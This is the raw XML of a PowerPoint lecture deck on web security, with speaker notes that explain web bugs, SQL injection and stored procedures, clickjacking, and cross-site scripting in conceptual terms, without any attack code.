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4" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="588" r:id="rId8"/>
    <p:sldId id="291" r:id="rId9"/>
    <p:sldId id="366" r:id="rId10"/>
    <p:sldId id="271" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="292" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="259" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="589" r:id="rId17"/>
    <p:sldId id="388" r:id="rId18"/>
    <p:sldId id="392" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="394" r:id="rId21"/>
    <p:sldId id="263" r:id="rId22"/>
    <p:sldId id="278" r:id="rId23"/>
    <p:sldId id="395" r:id="rId24"/>
    <p:sldId id="264" r:id="rId25"/>
    <p:sldId id="285" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
    <p:sldId id="571" r:id="rId28"/>
    <p:sldId id="384" r:id="rId29"/>
    <p:sldId id="572" r:id="rId30"/>
    <p:sldId id="357" r:id="rId31"/>
    <p:sldId id="359" r:id="rId32"/>
    <p:sldId id="360" r:id="rId33"/>
    <p:sldId id="361" r:id="rId34"/>
    <p:sldId id="362" r:id="rId35"/>
    <p:sldId id="386" r:id="rId36"/>
    <p:sldId id="573" r:id="rId37"/>
    <p:sldId id="363" r:id="rId38"/>
    <p:sldId id="365" r:id="rId39"/>
    <p:sldId id="368" r:id="rId40"/>
    <p:sldId id="574" r:id="rId41"/>
    <p:sldId id="575" r:id="rId42"/>
    <p:sldId id="389" r:id="rId43"/>
    <p:sldId id="387" r:id="rId44"/>
    <p:sldId id="390" r:id="rId45"/>
    <p:sldId id="260" r:id="rId46"/>
    <p:sldId id="585" r:id="rId47"/>
    <p:sldId id="586" r:id="rId48"/>
    <p:sldId id="587" r:id="rId49"/>
    <p:sldId id="339" r:id="rId50"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId52"/>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6E43"/>
    <a:srgbClr val="A27E55"/>
    <a:srgbClr val="272827"/>
    <a:srgbClr val="6E6E6E"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="888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183D45-0211-4403-B315-E7AEA9FAC572}" v="3" dt="2021-06-03T20:43:02.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89370" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="130" d="100"/>
          <a:sy n="130" d="100"/>
        </p:scale>
        <p:origin x="1096" y="160"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3840"/>
        <p:guide orient="horz" pos="1620"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="3" d="2"/>
        <a:sy n="3" d="2"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="87" d="100"/>
        <a:sy n="87" d="100"/>
      </p:scale>
      <p:origin x="0" y="-184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ves-Foss, Jim (jimaf@uidaho.edu)" userId="0ad79d20-0c0e-4450-b16f-ea034fd808f3" providerId="ADAL" clId="{515D7FE7-1C46-47B0-BF9D-8C9A3CA80603}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Alves-Foss, Jim (jimaf@uidaho.edu)" userId="0ad79d20-0c0e-4450-b16f-ea034fd808f3" providerId="ADAL" clId="{515D7FE7-1C46-47B0-BF9D-8C9A3CA80603}" dt="2021-06-03T23:13:38.947" v="24" actId="207"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Alves-Foss, Jim (jimaf@uidaho.edu)" userId="0ad79d20-0c0e-4450-b16f-ea034fd808f3" providerId="ADAL" clId="{515D7FE7-1C46-47B0-BF9D-8C9A3CA80603}" dt="2021-06-03T23:13:38.947" v="24" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3558998047" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Alves-Foss, Jim (jimaf@uidaho.edu)" userId="0ad79d20-0c0e-4450-b16f-ea034fd808f3" providerId="ADAL" clId="{515D7FE7-1C46-47B0-BF9D-8C9A3CA80603}" dt="2021-06-03T23:13:38.947" v="24" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3558998047" sldId="25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D4395-F4BB-4776-AD1A-E1F7520CF444}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/16/21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993E8-77CB-4CE8-8134-9D98A3510F3A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257544227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tiny image served up from one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>provider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ClicksRUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>”) that allows user behavior to be tracked across many sites for advertising purposes. Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Web bugs can also be used to track users’ reading of advertising emails.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F8FB96A2-1E57-3C4E-AB7D-E61B02F9CFEA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1131423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738814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554812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905305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425447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Stored procedures effectively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> separate SQL code from SQL data, thus preventing most SQL injection attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AE6EF5E0-C2FA-5142-86EE-14490FC049AF}" type="slidenum">
              <a:rPr lang="en-US">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605892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websites and applications in use today rely on databases to store the information they display and process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The most common SQL-related vulnerability is SQL injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{24023D51-0A9A-2D49-A9E9-E831C330CB4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4126375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F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1132997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F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1959659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F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277853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F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4085643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Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a way of tricking users into providing desired input. The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will. “Framing”—moving and layering HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>—is an important component of this attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AE6EF5E0-C2FA-5142-86EE-14490FC049AF}" type="slidenum">
              <a:rPr lang="en-US">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1823837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F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1984822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Explanation of the components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Browser:  Browser is on the client side, its primary function is to get content from the web server, present the content to the user, interact with the user and get the user inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application server: They are responsible for generating and delivering content to the browser. They usually rely on an independent database server for data management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0" dirty="0"/>
              <a:t>Browsers communicate with web servers using the Hypertext Transfer Protocol, while web servers interact with databases using database languages, such as SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{68F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1985705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Depending on whether the HTTP request is a GET or POST request, the ways how data are attached are different.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{68F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3943413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Code shows how query string is constructed, executed, and how the queried results are obtained.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Data typed in form, eventually become part of the SQL string executed by database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even though user doesn’t directly interact with the database, there does exists a channel between the user and the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If not protected properly, user may be able to launch attacks on the database through channel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{68F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3029864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F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16000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Unwanted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rowser toolbars are an example that just about every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> student will have had experience with.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AE6EF5E0-C2FA-5142-86EE-14490FC049AF}" type="slidenum">
              <a:rPr lang="en-US">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189753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FB96A2-1E57-3C4E-AB7D-E61B02F9CFEA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1215105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Input encoding, output encoding UTF- Unicode transformation Format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This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>badsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>anything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The http string contains embedded scripts, invoking java, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>activeX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or other executable code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F8FB96A2-1E57-3C4E-AB7D-E61B02F9CFEA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2397438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416390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When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>login,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>session</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assigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
